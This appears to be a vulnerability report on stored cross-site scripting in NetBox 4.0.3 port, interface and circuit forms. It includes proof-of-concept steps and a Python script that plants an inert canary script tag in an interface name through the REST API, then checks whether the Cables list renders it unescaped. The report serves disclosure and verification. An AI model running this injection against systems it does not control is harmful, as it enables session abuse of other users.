minhquan202/Vuln-Netbox
Description: Stored XSS in the following NetBox web UI views (the create and edit forms, not the REST API):

  • /dcim/power-ports/add/
  • /dcim/power-ports/{id}/edit/
  • /dcim/console-server-ports/add/
  • /dcim/console-server-ports/{id}/edit/
  • /dcim/interfaces/add/
  • /dcim/interfaces/{id}/edit/
  • /dcim/rear-ports/{id}/edit/
  • /dcim/rear-ports/add/
  • /dcim/front-ports/{id}/edit/
  • /dcim/front-ports/add/
  • /dcim/power-outlets/{id}/edit/
  • /dcim/power-outlets/add
  • /dcim/console-ports/add
  • /dcim/console-ports/{id}/edit/
  • /dcim/power-feeds/add
  • /dcim/power-feeds/{id}/edit/
  • /circuits/circuits/{id}/edit/
  • /circuits/circuits/add

in NetBox version 4.0.3 (https://github.com/netbox-community/netbox). A user who is permitted to create or edit these objects can store a script payload in the `name` parameter; for the two circuit views (`/circuits/circuits/{id}/edit/` and `/circuits/circuits/add`) the affected parameter is the circuit ID instead. The payload later executes in the browser of any user who views a page that renders the stored name, which an attacker can use to hijack that user's session cookie. Caveat: with Django's default `SESSION_COOKIE_HTTPONLY` setting the session cookie is not readable from script, so in that configuration the practical impact is actions performed with the victim's session from inside their browser rather than cookie theft.

Proof of Concept:

  1. Create or edit one of the objects listed above, putting a script-tag payload in the `name` field (the circuit ID field for circuits).
  2. In the UI, go to Connections > Cables and create a cable between two of the malicious components.
  3. Open Connections > Cables again: the stored payload executes as soon as the cable list renders.

Impact:

Hijack the user's session cookie.
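The three PoC steps above, scripted as an added example (this is not code from this report or from the NetBox project): it creates two interfaces, one carrying the payload, cables them through NetBox's REST API, then fetches the rendered Cables list with a browser session cookie and reports whether the component name came back as raw markup or entity-encoded. The API paths, field names, the `Authorization: Token` header, the `sessionid` cookie name and the environment variable names are assumptions about NetBox to be checked against the target version; only the classifier runs without a live instance.

```python
"""Verification harness for the stored-XSS report above.

Added example, not part of the original report or of NetBox. Everything about
the REST API shape (endpoints, token header, field names) and the session
cookie name is an assumption; nothing is contacted at import time.
"""
import html
import json
import os
import urllib.request

# A marker unlikely to occur in a real NetBox page, so the payload is located
# by content rather than by a generic "<script>" match.
CANARY = "xss-canary-7f3a"
PAYLOAD = f"<script>/*{CANARY}*/</script>"


def classify_rendering(page_html: str, payload: str = PAYLOAD) -> str:
    """Return 'unescaped' if the payload is present as raw markup,
    'escaped' if it only appears entity-encoded, 'absent' otherwise."""
    if payload in page_html:
        return "unescaped"
    if html.escape(payload) in page_html:  # Django's escape() produces the same entities
        return "escaped"
    return "absent"


def api_request(base_url: str, path: str, token: str, body=None):
    """Build an authenticated urllib Request for the NetBox REST API.
    Assumption: token auth is sent as 'Authorization: Token <key>'."""
    data = None if body is None else json.dumps(body).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + path,
        data=data,
        method="POST" if body is not None else "GET",
        headers={
            "Authorization": f"Token {token}",
            "Accept": "application/json",
            "Content-Type": "application/json",
        },
    )


def interface_payload(device_id: int, name: str, iface_type: str = "1000base-t") -> dict:
    """Body for POST /api/dcim/interfaces/ (assumed field names)."""
    return {"device": device_id, "name": name, "type": iface_type}


def cable_payload(a_interface_id: int, b_interface_id: int) -> dict:
    """Body for POST /api/dcim/cables/ in the multi-termination shape
    (assumed to match NetBox 4.0)."""
    return {
        "a_terminations": [{"object_type": "dcim.interface", "object_id": a_interface_id}],
        "b_terminations": [{"object_type": "dcim.interface", "object_id": b_interface_id}],
    }


def post_json(base_url: str, path: str, token: str, body: dict) -> dict:
    with urllib.request.urlopen(api_request(base_url, path, token, body)) as resp:
        return json.load(resp)


def reproduce(base_url: str, token: str, session_cookie: str,
              device_a: int, device_b: int) -> str:
    """PoC steps 1-3: create two interfaces (one named with the payload),
    cable them, then fetch /dcim/cables/ the way a logged-in browser would.
    Returns classify_rendering() of the cable list page."""
    a = post_json(base_url, "/api/dcim/interfaces/", token,
                  interface_payload(device_a, PAYLOAD))
    b = post_json(base_url, "/api/dcim/interfaces/", token,
                  interface_payload(device_b, f"peer-{CANARY}"))
    post_json(base_url, "/api/dcim/cables/", token, cable_payload(a["id"], b["id"]))
    # The Cables list is a UI view rendered for a browser session, not an API
    # endpoint, so it is fetched with the session cookie instead of the token.
    # Assumption: the cookie uses Django's default name 'sessionid'.
    req = urllib.request.Request(
        base_url.rstrip("/") + "/dcim/cables/",
        headers={"Cookie": f"sessionid={session_cookie}"},
    )
    with urllib.request.urlopen(req) as resp:
        return classify_rendering(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Environment variable names are this example's own convention.
    verdict = reproduce(
        os.environ["NETBOX_URL"], os.environ["NETBOX_TOKEN"],
        os.environ["NETBOX_SESSIONID"],
        int(os.environ["NETBOX_DEVICE_A"]), int(os.environ["NETBOX_DEVICE_B"]),
    )
    print(f"cable list renders component name: {verdict}")
```

Run it only against a test instance you own: it writes two interfaces and a cable and leaves them in place for inspection. A verdict of `unescaped` reproduces the report; `escaped` means the view now entity-encodes the name; `absent` usually means the cable list is paginated or filtered and the new cable is not on the first page, so widen the fetch before drawing a conclusion.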
